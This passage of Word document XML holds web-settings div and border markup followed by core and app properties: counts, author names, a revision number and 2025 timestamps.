      <w:divsChild>
        <w:div w:id="555090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497684">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1743333680">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1943370744">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1957638809">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="199494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3514</Words>
  <Characters>20033</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>166</Lines>
  <Paragraphs>46</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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polaris</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>polaris my017</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-01T04:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-01T13:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>